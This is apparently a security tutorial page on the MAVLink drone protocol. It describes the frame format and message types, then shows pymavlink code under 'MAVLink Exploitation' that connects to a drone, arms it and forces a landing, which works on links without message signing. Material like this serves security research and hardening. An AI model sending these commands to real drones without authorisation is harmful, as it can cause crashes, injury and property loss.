MAVLink Protocol
Protocol
MAVLink is the standard protocol for ArduPilot and PX4 drones. It handles telemetry, commands, and mission uploads - often without authentication.
MAVLink Message Structure
text
MAVLink v2 Frame:
+-----+-----+-----+-----+--------+--------+---------+------+-------+
| STX | LEN | SEQ | SYS | COMP | MSG ID | PAYLOAD | CRC | SIG |
| FD | | | ID | ID | (3B) | | (2B) | (13B) |
+-----+-----+-----+-----+--------+--------+---------+------+-------+
Common message types:
- HEARTBEAT (0): System alive indicator
- SET_MODE (11): Change flight mode
- COMMAND_LONG (76): Execute command
- MISSION_ITEM (39): Waypoint data
- RC_CHANNELS_OVERRIDE (70): Override RC inputMAVLink Exploitation
python
# pymavlink - Python MAVLink library
pip install pymavlink
from pymavlink import mavutil
# Connect to telemetry radio
conn = mavutil.mavlink_connection('/dev/ttyUSB0', baud=57600)
# Or UDP connection
conn = mavutil.mavlink_connection('udp:127.0.0.1:14550')
# Wait for heartbeat
conn.wait_heartbeat()
print(f"System {conn.target_system} Component {conn.target_component}")
# Arm the vehicle (dangerous!)
conn.mav.command_long_send(
conn.target_system, conn.target_component,
mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
0, 1, 0, 0, 0, 0, 0, 0
)
# Force landing
conn.mav.command_long_send(
conn.target_system, conn.target_component,
mavutil.mavlink.MAV_CMD_NAV_LAND,
0, 0, 0, 0, 0, 0, 0, 0
)No Auth by Default
MAVLink v2 supports message signing but it's often disabled. Unsigned connections
accept commands from any source.